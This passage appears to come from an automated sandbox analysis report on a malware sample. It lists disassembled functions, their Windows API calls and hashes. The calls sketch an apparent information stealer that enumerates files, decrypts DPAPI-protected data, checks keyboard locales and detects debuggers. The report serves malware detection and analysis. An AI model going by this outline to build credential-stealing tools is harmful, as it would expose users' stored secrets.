                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                              • String ID: \*.*$@
                                              • API String ID: 433455689-2355794846
                                              • Opcode ID: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                              • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                              • Opcode Fuzzy Hash: fd4b8a02529220b5ed0f2464db00e78548197825fe913ecccb08edd01f2acd1a
                                              • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                              Function 04841977 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425244,?,?,?,004252EC,?,?,00000000,?,00000000), ref: 04841BCA
                                              • StrCmpCA.SHLWAPI(?,00425394), ref: 04841C1A
                                              • StrCmpCA.SHLWAPI(?,0042543C), ref: 04841C30
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 04841FE7
                                              • DeleteFileA.KERNEL32(00000000), ref: 04842071
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 048420C7
                                              • FindClose.KERNEL32(000000FF), ref: 048420D9
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 1415058207-0
                                              • Opcode ID: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                              • Instruction ID: cfa1b80422c945df5bba81980ef13779be0be5e6765ea568c14417dea0953c73
                                              • Opcode Fuzzy Hash: 56f2edb5ed5ac7363b7b2ebd9afdb303bb2dbb6ba0bbe840f4244a047c0a7428
                                              • Instruction Fuzzy Hash: 7B12CE719002189BDB5DFB64DC94EED7379AF54305F404BE9990AA20A0EFB47B88CF52
                                              Function 0484E177 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004215B8,00420C32), ref: 0484E1C5
                                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 0484E215
                                              • StrCmpCA.SHLWAPI(?,004215C4), ref: 0484E22B
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484E747
                                              • FindClose.KERNEL32(000000FF), ref: 0484E759
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                              • String ID:
                                              • API String ID: 2325840235-0
                                              • Opcode ID: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                              • Instruction ID: c2702fdd6259246670b1b794e13735dd6a864b60c6c171e281d2e6d9f008b476
                                              • Opcode Fuzzy Hash: 331afb331abdd3764059b67a16730e5bc1ed144ae4cc64f7786a3dfac513c809
                                              • Instruction Fuzzy Hash: BBF1A0719142289ADB5DFB64DCD4EEE7334AF54305F804BDA985AA2060EFB07F88CE51
                                              Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                              • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                              • String ID: /
                                              • API String ID: 3090951853-4001269591
                                              • Opcode ID: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                              • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                              • Opcode Fuzzy Hash: a9c2a3d8980f824397494a6f3138396e161b863b8c8af303ecba9acef840721c
                                              • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                              Function 0040C920 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 0040C953
                                              • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02C9EDF0), ref: 0040C971
                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                              • memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                              • lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                              • lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                              • lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                              • String ID:
                                              • API String ID: 1498829745-0
                                              • Opcode ID: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                              • Instruction ID: ab8a272bb0ac48908ccb48df32c4a676bf2e37b68a454f4a62162a4422f92537
                                              • Opcode Fuzzy Hash: b72dd9bfbf458160f1e602edd60bafd9c1ab3fe4aebb36f7fc77a597216b37cf
                                              • Instruction Fuzzy Hash: FD4130B4E0421DDBDB10CFA4DD89BEEB7B9BB48304F1042AAF509A62C0D7745A84CF95
                                              Function 0484CB87 Relevance: 10.6, APIs: 7, Instructions: 93stringencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 0484CBBA
                                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0484CBD8
                                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0484CBE3
                                              • memcpy.MSVCRT(?,?,?), ref: 0484CC79
                                              • lstrcat.KERNEL32(?,00420B47), ref: 0484CCAA
                                              • lstrcat.KERNEL32(?,00420B4B), ref: 0484CCBE
                                              • lstrcat.KERNEL32(?,00420B4E), ref: 0484CCDF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                              • String ID:
                                              • API String ID: 1498829745-0
                                              • Opcode ID: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                              • Instruction ID: c5142127612bbdf015ae0baed0342578d614286f0b44af2c1b7746dad7d27a6c
                                              • Opcode Fuzzy Hash: bfbaf21689b8136d467466e44178197795bb6f205839b656af30e0f0eb0eb3c5
                                              • Instruction Fuzzy Hash: 54415EB4D0521DEBDB10CFA4DD88BEEBBB9BB44304F1046A9E509A7280D7746B84CF91
                                              Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0041BEA2
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
                                              • UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
                                              • TerminateProcess.KERNEL32(00000000), ref: 0041BEE5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID: eM
                                              • API String ID: 2579439406-4107679315
                                              • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                              • Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
                                              • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                              • Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D
                                              Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                              • LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID: >O@
                                              • API String ID: 4291131564-3498640338
                                              • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                              • Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
                                              • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                              • Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50
                                              Function 048AED3D Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: \u$\u${${$}$}
                                              • API String ID: 0-582841131
                                              • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                              • Instruction ID: 4e5f1913899ebd1c086ce1faf3250eea9b45de10e20eb1a9b8e67dda958389be
                                              • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                              • Instruction Fuzzy Hash: D641AA22E09BC9C5DB018F7844A02BEBFB26FE6210F5D479AC4985F382C7B4515AD3A5
                                              Function 04857F87 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 04857FD8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 04857FF0
                                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 04858004
                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 04858059
                                              • LocalFree.KERNEL32(00000000), ref: 04858119
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                              • String ID:
                                              • API String ID: 3090951853-0
                                              • Opcode ID: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                              • Instruction ID: 562e11e3983d0c0ccce516951f8ca92c3b06fb8b95f8e249ab4f6e41aa4a0fe5
                                              • Opcode Fuzzy Hash: a4d0a0c2b3a684d2ad9d0c86ecadcb3cbe89c53720147a644a945addcb2b8918
                                              • Instruction Fuzzy Hash: 99415E71941228ABDB28EF94DC88FEDB374FF44704F10469AE809A21A0DB746F88CF51
                                              Function 0485B8A1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 0485C109
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0485C11E
                                              • UnhandledExceptionFilter.KERNEL32(0041F2B0), ref: 0485C129
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0485C145
                                              • TerminateProcess.KERNEL32(00000000), ref: 0485C14C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                              • String ID:
                                              • API String ID: 2579439406-0
                                              • Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                              • Instruction ID: e5601b4870d5f7f5a9614f604f6a2b831c8557bde2c27ad248cb3da13475647b
                                              • Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
                                              • Instruction Fuzzy Hash: 5921DDB8902314DFDB10DF69F885A883BB4FB08314F12817BE91887271E7B1A9818F1D
                                              Function 004072A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0), ref: 004072AD
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                              • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                              • String ID:
                                              • API String ID: 3657800372-0
                                              • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                              • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                              • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                              • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                              Function 04847507 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 04847514
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0484751B
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 04847548
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0484756B
                                              • LocalFree.KERNEL32(?), ref: 04847575
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                              • String ID:
                                              • API String ID: 2609814428-0
                                              • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                              • Instruction ID: 12817fdeae5a9115aded1962d84d349431a50ce38090c57489add4cb03fc5853
                                              • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                              • Instruction Fuzzy Hash: FE010CB5A45308BBEB10DFE8DD46F9D7779AB44B04F108546FB05AA2C0D7B0AB008B65
                                              Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                              • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                              • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                              • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                              • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                              • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                              • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                              Function 048599F7 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04859A15
                                              • Process32First.KERNEL32(00420ACE,00000128), ref: 04859A29
                                              • Process32Next.KERNEL32(00420ACE,00000128), ref: 04859A3E
                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 04859A53
                                              • CloseHandle.KERNEL32(00420ACE), ref: 04859A71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                              • Instruction ID: 68b28af1401b5dbea2d4d03e27e1154141eb6d68d4e21d7ec1f942641c5f36d7
                                              • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                              • Instruction Fuzzy Hash: 6A010CB5E05208EBCB21DFA4CD84BDDB7B9BB08700F404689E909D6250EB70AB84CF61
                                              Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharCreateInstanceMultiWide
                                              • String ID: ,<A
                                              • API String ID: 123533781-3158208111
                                              • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                              • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                              • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                              • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                              Function 0484E797 Relevance: 6.5, APIs: 4, Instructions: 514fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215E8,00420D79), ref: 0484E809
                                              • StrCmpCA.SHLWAPI(?,004215F0), ref: 0484E859
                                              • StrCmpCA.SHLWAPI(?,004215F4), ref: 0484E86F
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484EF46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                              • String ID:
